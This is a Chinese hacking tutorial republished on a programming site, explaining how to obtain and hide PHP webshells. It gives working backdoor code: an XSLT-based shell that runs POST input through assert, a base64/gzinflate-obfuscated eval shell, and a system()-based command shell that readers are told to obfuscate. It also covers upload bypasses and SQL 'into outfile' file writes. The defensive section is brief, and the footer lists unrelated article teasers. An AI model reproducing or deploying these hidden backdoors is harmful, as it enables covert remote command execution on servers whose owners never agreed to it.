【渗透攻防】千变万化的WebShell

news2024/11/23 3:28:21

前言
WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。本篇文章将带大家学习如何获取WebShell,如何隐藏WebShell,有攻必有防,最后带大家学习查杀WebShell。

目录

  • 第一节 CMS获取WebShell

  • 第二节 非CMS获取WebShell

  • 第三节 基于xslt转换的WebShell

  • 第四节 代码混淆隐藏WebShell

  • 第五节 防御篇-查杀WebShell

正文

  • 第一节 CMS获取WebShell

1.1、什么是CMS?
CMS是Content Management System的缩写,意为"内容管理系统"。 内容管理系统是企业信息化建设和电子政务的新宠,也是一个相对较新的市场。对于内容管理,业界还没有一个统一的定义,不同的机构有不同的理解。

1.2、常见的CMS有哪些?

  • asp平台:动易CMS、创力CMS、科汛CMS、新云CMS;

  • php平台:phpcms、织梦CMS、帝国CMS、php168 CMS;

  • ASP.NET平台:Zoomla!逐浪CMS、动易CMS、风讯CMS、We7 CMS;

1.3、CMS获取WebShell方法

公开漏洞途径:以PHPCMS为例:
我们可以利用搜索引擎来查找互联网上公开的通用漏洞,如果目标站点并没有进行修复,即可轻松获取WebShell。

代码审计途径:
有很多CMS其实是开源的,我们可以在官网下载到源码,然后进行代码审计,自己挖掘漏洞, 来获取WebShell。关于代码审计的教程篇幅太长,这里就不做更多介绍,我会单独写一篇系列文章进行讲解。

  • 第二节 非CMS获取WebShell

2.1、上传漏洞获取WebShell

文件上传漏洞主要有以下几种情况:

  • MIME类型绕过漏洞

  • 文件扩展名绕过漏洞

  • 文件内容检测绕过类上传漏洞

  • 空字节截断目录路径检测绕过类上传漏洞

解析导致的文件上传漏洞:

  • IIS6.0站上的目录路径检测解析绕过上传漏洞

  • Apache站上的解析缺陷绕过上传漏洞

  • htaccess文件上传解析漏洞

还有一些编辑器存在漏洞导致的文件上传,比如FCK编辑器。

2.2、SQL注入获取WebShell

利用SQL注入攻击获取WebShell其实就是在向服务器写文件。(注意:这里我们需要得到网站的绝对路径)所有常用的关系数据库管理系统(RDBMS)均包含内置的向服务器文件系统写文件的功能。

MySQL:

select into outfile(dumpfile)  //MySQL写文件命令

例如:

select "<?php echo 'test'; ?>" into outfile "F:\\\www\\\test.php";

那么其它关系数据库管理系统同样的原理写文件,就不在过多介绍了。

2.3、数据库备份获取WebShell

利用数据库备份获取WebShell,恰好i春秋有相关的实验,我也发过相关的教程,这里就不介绍了,大家去看看吧,第三步就是利用数据库备份拿WebShell。
2015中国网络安全大赛:越权访问真题

配套实验地址:(进去后选择越权访问点击START就行了)
2015中国网络安全大赛

  • 第三节 基于xslt转换的WebShell

3.1、什么是xslt?

在了解什么是xslt之前,我们需要先了解什么是xsl,XSL是可扩展样式表语言的外语缩写,是一种用于以可读格式呈现 XML(标准通用标记语言的子集)数据的语言。
XSL - 不仅仅是样式表语言
XSL 包括三部分:
XSLT - 一种用于转换 XML 文档的语言。
XPath - 一种用于在 XML 文档中导航的语言。
XSL-FO - 一种用于格式化 XML 文档的语言。

那么看到这里相信大家已经了解到xslt是xsl的一部分。

3.2、在PHP下基于xslt转换来隐藏WebShell

怎么在php下使用xsl呢?我教大家的都是可以自己学习的方法,既然要使用php,我们肯定要去看php的官方手册,我们去搜索xsl

定位到XSLTProcessor类,可以发现registerPHPFunctions方法,如果你根本不懂这些方法,不要紧,看后面的英文介绍,如果你说你不懂英文,不要紧啊,不有google翻译,拿去翻译一下

Enables the ability to use PHP functions as XSLT functions

我们点进去,可以发现里面有事例,很简单,建议大家去看看啊。PHP手册地址见下面的参考资料

我们先来看看官方事例:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0"     xmlns:xsl="http://www.w3.org/1999/XSL/Transform"     xmlns:php="http://php.net/xsl">          //这个命名空间URI表示php专用的xsl函数支持<xsl:output method="html" encoding="utf-8" indent="yes"/>
 <xsl:template match="allusers">  <html><body>    <h2>Users</h2>
    <table>    <xsl:for-each select="user">      <tr><td>        <xsl:value-of
             select="php:function('ucfirst',string(uid))"/>     //php:function('assert',string(.))表示将匹配节点的文本作为参数传递给php的assert函数。
      </td></tr>    </xsl:for-each>
    </table>
  </body></html> </xsl:template>
</xsl:stylesheet>

那么搞懂了以上这些知识,那就很简单了。

为了避免xml的转义问题,进行一次assert嵌套,最终WebShell如下:

<?php
$xml='<ichunqiu>assert($_POST\[zusheng\]);</ichunqiu>';
$xsl='<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:icq="http://php.net/xsl">
 <xsl:template match="/ichunqiu">
    <xsl:value-of select="icq:function(\\'assert\\',string(.))"/>
 </xsl:template>
</xsl:stylesheet>';
$xmldoc = DOMDocument::loadXML($xml);
$xsldoc = DOMDocument::loadXML($xsl);
$proc = new XSLTProcessor();
$proc->registerPHPFunctions();
$proc->importStyleSheet($xsldoc);
$proc->transformToXML($xmldoc);?>

可以直接用菜刀连接:(密码:zusheng)

参考资料:

  • PHP官方手册:http://php.net/manual/zh/

  • 第四节 代码混淆隐藏WebShell

代码混淆隐藏WebShell也就是通过编码和压缩恶意代码的方式来隐藏WebShell。

这里我们使用gzinflate+Base64加密,来隐藏WebShell。

<?php
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVq8qLc5IzUtXj9W0BgA=')));?>

可以直接用菜刀连接:(密码:zusheng)

  • 第五节 防御篇-查杀WebShell

5.1、WebShell的分类

5.2、安全工具
D盾:

360主机卫士:
提供在线监测,把网站打包成zip上传就行了
http://zhuji.360.cn/backdoor

小实验

学完上述知识,大家是不是想动手来试试了呢,来个小实验。

我们先新建一个php文件

文件内容如下:

<?phpif (isset($_GET\["cmd"\]))
{
array\_diff\_ukey(@array($_GET\['cmd'\]=>1),@array('user'=>2),'system');
}?>

使用gzinflate+Base64加密,来隐藏WebShell。
使之能正常运行。

结束语

作为一名黑客,在你取得成功的问题上没有什么诀窍可寻,只有你越努力工作,你才能越接近成功。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1041292.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

服务接口调用OpenFeign_超时机制

超时机制 问题&#xff1a; 服务消费者在调用服务提供者的时候发生了阻塞、等待的情形&#xff0c;这个时候&#xff0c;服务消费者会一直等待下去。在某个峰值时刻&#xff0c;大呈的请求都在同时请求服务消费者&#xff0c;会造成线程的大呈堆积&#xff0c;势必会造成雪崩。…

SpringBoot 学习(六)Shiro

6. Shiro 6.1 简介 6.1.1 什么是Shiro Apache Shiro 是一个 Java 的安全权限框架。Shiro 可以应用在 JavaSE 和 JavaEE 环境中。Shiro 可以完成认证、授权、加密、会话管理、web 集成、缓存等。下载地址&#xff1a;http://shiro.apache.org/ 6.1.2 能力 ​ Authenticat…

玄子Share 设计模式 GOF 全23种 + 七大设计原则

玄子Share 设计模式 GOF 全23种 七大设计原则 前言&#xff1a; 此文主要内容为 面向对象七大设计原则&#xff08;OOD Principle&#xff09;GOF&#xff08;Gang Of Four&#xff09;23种设计模式拓展的两个设计模式 简单工厂模式&#xff08;Simple Factory Pattern&#x…

【Spring Boot】实战:实现Session共享

🌿欢迎来到@衍生星球的CSDN博文🌿 🍁本文主要学习实现Session共享 🍁 🌱我是衍生星球,一个从事集成开发的打工人🌱 ⭐️喜欢的朋友可以关注一下🫰🫰🫰,下次更新不迷路⭐️💠作为一名热衷于分享知识的程序员,我乐于在CSDN上与广大开发者交流学习。 💠我…

【LeetCode热题100】--240.搜索二维矩阵II

240.搜索二维矩阵II 编写一个高效的算法来搜索 m x n 矩阵 matrix 中的一个目标值 target 。该矩阵具有以下特性&#xff1a; 每行的元素从左到右升序排列。每列的元素从上到下升序排列。 方法一&#xff1a;使用二分查找 class Solution {public boolean searchMatrix(int[…

做BI智能数据分析,奥威BI系统是专业的

威BI系统是一个全方位智能化、可视化的企业数据分析工具&#xff0c;注重满足企业的实际需求&#xff0c;提供贴合实际的解决方案&#xff0c;旨在帮助企业更好地利用数据&#xff0c;以实现商业价值。 注重企业数据的收集、整合和管理 对于企业来说&#xff0c;数据的来源和…

Mysql备份恢复、与日志管理

Mysql日志管理、备份与恢复 一、Mysql日志管理1.1、日志分类1.1.1、错误日志1.1.2 、通用查询日志1.1.3、 二进制日志1.1.4 、慢查询日志1.1.5 、配置日志 1.2、日志的查询 二、备份与恢复2.1、 数据备份的必要性2.2 、造成数据丢失的原因2.3、 数据库备份的分类2.3.1、 物理备…

在嵌入式设计中添加双向I2C数字隔离

嵌入式开发工程师曾使用光电耦合器进行I2C隔离。这些电路有些复杂&#xff0c;对总线电容敏感&#xff0c;并且速度有限。它们也与具有标准CMOS输入电平的高速数字隔离器不兼容。 该嵌入式开发工程师思想展示了如何将标准的高速数字隔离器转换为双向I2C隔离器。除了与数字隔离…

visual studio的安装

visual studio是一款很不错的c语言编译器 下载地址&#xff1a;官网 点击后跳转到以下界面 下滑后点击下载Vasual Sutdio&#xff0c;选择社区版即可 选择位置存放下载文件后&#xff0c;即可开始安装 安装时会稍微等一小会儿。然后会弹出这个窗口&#xff0c;我们选择安装位…

Mycat管理及监控

Mycat管理 -h 是你自己的ip地址 相关命令及含义 Mycat-eye(图形化界面监控) 仅限于Linux系统

2023年【北京市安全员-C3证】考试技巧及北京市安全员-C3证模拟试题

题库来源&#xff1a;安全生产模拟考试一点通公众号小程序 2023年北京市安全员-C3证考试技巧为正在备考北京市安全员-C3证操作证的学员准备的理论考试专题&#xff0c;每个月更新的北京市安全员-C3证模拟试题祝您顺利通过北京市安全员-C3证考试。 1、【多选题】下面属于违章作…

小程序中Echarts实现隐藏x轴,y轴,刻度线,网格

参考了大佬的链接 首次在小程序中使用echarts踩了一些小坑做个记录&#xff0c;希望可以帮到同样踩坑的同学 这里以柱状图作为例子&#xff0c;扁扁的柱状图什么线都没有了 xAxis: {show:false, // 不显示坐标轴线、坐标轴刻度线和坐标轴上的文字axisTick:{show:false // 不显…

css实现渐变电量效果柱状图

我们通常的做法就是用echarts来实现 比如 echarts象形柱图实现电量效果柱状图 接着我们实现进阶版&#xff0c;增加渐变效果 echarts分割柱形图实现渐变电量效果柱状图 接着是又在渐变的基础上&#xff0c;增加了背景色块的填充 echarts实现渐变电量效果柱状图 其实思路是一…

如何使用ArcGIS Pro直接获取道路中心线

以前使用ArcGIS获取道路中心线&#xff0c;需要先将面要素转换为栅格再获取中心线&#xff0c;现在我们可以通过ArcGIS Pro直接获取道路中心线&#xff0c;这里为大家介绍一下获取方法&#xff0c;希望能对你有所帮助。 新建地理数据库 在存储数据的文件夹上点击右键&#xff…

基础运维(一)YUM仓库

一 自定义YUM仓库 1 Yum仓库特点 作为yum源需要准备的内容 大量的rpm 软件安装包文件针对这些软件包的 repodata/ 仓库档案 repodata/ 仓库档案数据 filelists.xml.gz // 软件包的文件安装清单primary.xml.gz // 软件包的基本/主要信息other.xml.gz // 软件包…

ROS2 从头开始:第 08/8回 - 使用 ROS2 生命周期节点简化机器人软件组件管理

一、说明 欢迎来到我在 ROS2 上的系列的第八部分。对于那些可能不熟悉该系列的人,我已经涵盖了一系列主题,包括 ROS2 简介、如何创建发布者和订阅者、自定义消息和服务创建、

44.java教程

目录 一、Java 教程。 &#xff08;1&#xff09;我的第一个 JAVA 程序。 &#xff08;2&#xff09;Java 简介。 &#xff08;2.1&#xff09;java简介。 &#xff08;2.2&#xff09;主要特性。 &#xff08;2.3&#xff09;发展历史。 &#xff08;2.4&#xff09;J…

Tomcat9 AJP 任意文件读取和文件包含漏洞(CVE-2020-1938)

Tomcat9 AJP 任意文件读取和文件包含漏洞&#xff08;CVE-2020-1938&#xff09; 文章目录 Tomcat9 AJP 任意文件读取和文件包含漏洞&#xff08;CVE-2020-1938&#xff09;1 在线漏洞解读:2 环境搭建2.1 修改端口80892.2 环境启动&#xff1a; 3 漏洞复现 1 在线漏洞解读: ht…

web服务基础

前言&#xff1a;web服务怎么做&#xff0c;怎样使用&#xff0c;这是一个长期的任务 1、DNS解析原理 在windows 客户端查看本地缓存的DNS解析记录 C:\Users\86157>ipconfig /displaydns #其中这两个字符之间会有空格 在windows11 中的命令行运行结果如下 清除win客户端…

LeetCode力扣09:回文数

回文数 代码实现 代码1是使用将整形数字倒置来进行对比&#xff0c;最后得出答案 class Solution(object):def isPalindrome(self, x):""":type x: int:rtype: bool"""if x<0:return Falseres0oldxwhile x:ax%10resres*10ax//10return reso…